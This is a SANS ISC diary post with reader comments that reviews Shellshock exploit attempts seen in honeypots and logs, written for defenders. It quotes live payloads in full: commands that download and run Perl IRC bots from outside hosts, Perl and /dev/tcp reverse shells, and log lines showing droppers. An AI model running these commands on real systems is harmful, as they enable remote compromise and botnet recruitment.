Ever since the shellshock vulnerability has been announced, we have seen a large number of scans probing it. Here is a quick review of exploits that our honeypots and live servers have seen so far: 1 - Simple "vulnerability checks" that used custom User-Agents: () { 0v3r1d3;};echo \x22Content-type: text/plain\x22; echo; uname -a; This one is a bit different. It includes the tested URL as user agent. But of course, it doesn't escape special characters correctly, so this exploit would fail in this case. The page at 89.248.172.139 appears to only return an "empty page" message. ) { :;}; /bin/bash -c \x22wget -U BashNslash.http://isc.sans.edu/diary/Update+on+CVE-2014-6271:+Vulnerability+in+bash+(shellshock)/18707 89.248.172.139\x22
2 - Bots using the shellshock vulnerability: This one installs a simple perl bot. Connects to irc.hacker-newbie.org port 6667 channel #bug () { :; }; \x22exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b\ 3 - Vulnerability checks using multiple headers: GET / HTTP/1.0 4 - Using Multiple headers to install perl reverse shell (shell connects to 46.246.34.82 port 1992 in this case) GET / HTTP/1.1 5 - Using User-Agent to report system parameters back (the IP address is currently not responding) GET / HTTP/1.0 6 - User-Agent used to install perl box GET / HTTP/1.0
--- |
Johannes 4479 Posts ISC Handler Sep 29th 2014 |
Thread locked Subscribe |
Sep 29th 2014 7 years ago |
I've seen the 0v3r1d3 one, as well as one that looks like:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\" The document at that URL claims it another security research company. I also got another that actually delivers a directly malicious payload: () { :;}; /bin/bash -c \"wget http://legendsoftwares.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache\" |
Ryan 2 Posts |
Quote |
Sep 29th 2014 7 years ago |
"legend.txt" looks like an IRC bot written in perl. Connects to chaos.legend.rocks port 7777. Currently about 100 bots in that channel.
|
Johannes 4479 Posts ISC Handler |
Quote |
Sep 29th 2014 7 years ago |
There are also people attempting to create reverse shells - for example "USER-AGENT : () { :; }; /bin/bash -i >& /dev/tcp/[IP_ADDRESS]/80 0>&1".
|
Anonymous |
Quote |
Sep 29th 2014 7 years ago |
66.150.114.30 -- "GET /test HTTP/1.0" 404 368 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
This is the one I'm seeing show up. It's actually the first one I saw. |
Zach W 10 Posts |
Quote |
Sep 29th 2014 7 years ago |
We've seen about 1000 attempts from a pair of IP addresses with the following;
User-Agent: () { :; }; "exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')"; |
Max 1 Posts |
Quote |
Sep 30th 2014 7 years ago |
Pulled quite a list of perlbot installation attempts out of my web logs.
Sent abuse mails to the providers hosting the C&C IRC servers configured in the perl files. Also got the bash-count.txt hit. I wonder what good that scan is.. I guess most admins who find that line in their logs will wget the file manually, and end up as a false positive on the research database. |
Visi 41 Posts |
Quote |
Sep 30th 2014 7 years ago |
These sample exploits lead me to want to remind everyone of the importance of proper Egress filtering.
At least the ones that rely on running 'wget' or 'curl' as the Apache/web server user would not work on my main web server, assuming bash had not been patched :) |
Mysid 146 Posts |
Quote |
Sep 30th 2014 7 years ago |
I've been caught by number 6 - User-Agent used to install perl box
On attempting to pull down the file onto an isolated test machine, all I get is a html welcome page, so I guess that the original exploit has been removed. Can anyone give me more details as to what the original script did so that I can evaluate the damage while we rebuild the system? Thanks, Alex |
Mysid 1 Posts |
Quote |
Sep 30th 2014 7 years ago |
() { :;}; /bin/bash -c "/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm
Appears to be a bot that is trying to look like google analytics. |
Mysid 1 Posts |
Quote |
Oct 2nd 2014 7 years ago |
One of my virtual servers got attacked with that perl box installation:
access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /cgi-bin/test.sh HTTP/1.0" 404 358 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET / HTTP/1.0" 200 1 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" access.log:70.42.149.79 - - [28/Sep/2014:06:35:46 -0400] "GET /test HTTP/1.0" 404 347 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" Every time right after rebooting the server netstat displayed a bot connection in port 25: vps-1044161-3266:/etc# netstat -nap Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name . . . tcp 0 0 168.144.XX.XX:25 92.87.210.196:57180 TIME_WAIT - The destination address varied from reboot to another. I made a test and removed postfix installation the server. After removing postfix I cann't detect any botnet connection on port 25. Unfortunately the post fix is gone, so I'm not able to analyze the postfix binaries any further. But I suggest that ec.z changed the postfix binaries. |
Mysid 1 Posts |
Quote |
Oct 2nd 2014 7 years ago |
We're still seeing these attacks (from specific IPs - despite complaints to their ISP) They are targeting specific (Perl) files, using this sort of code:
() { (a)=>\\' bash -c 'echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit () { (a)=>\\' bash -c 'echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit () { (a)=>\\' bash -c 'echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit () { (a)=>\\' bash -c 'echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit () { (a)=>\\' bash -c 'echo;echo \"d2d0\"'e609'd40dabb802ef23ef2ade2ba3;echo;exit () { :;};echo;echo \"2ccd\"'4063'b5ecd1ca657b1320af977f12;echo;exit () { :;};echo;echo \"550e\"'18b5'8da1722ce6ce436d4396a8db;echo;exit () { :;};echo;echo \"59a1\"'1011'04252cc75509c6c06d42db4b;echo;exit () { :;};echo;echo \"87fd\"'d1c3'e89fe3a261f789426e10517e;echo;exit in the referrer and cookie fields. I've not been able to find these in any other exploit posts. I have seen the attempts in a few other google-able logs though. Any idea what they're trying to do? |
afbach 6 Posts |
Quote |
Oct 13th 2014 7 years ago |
Sign Up for Free or Log In to start participating in the conversation!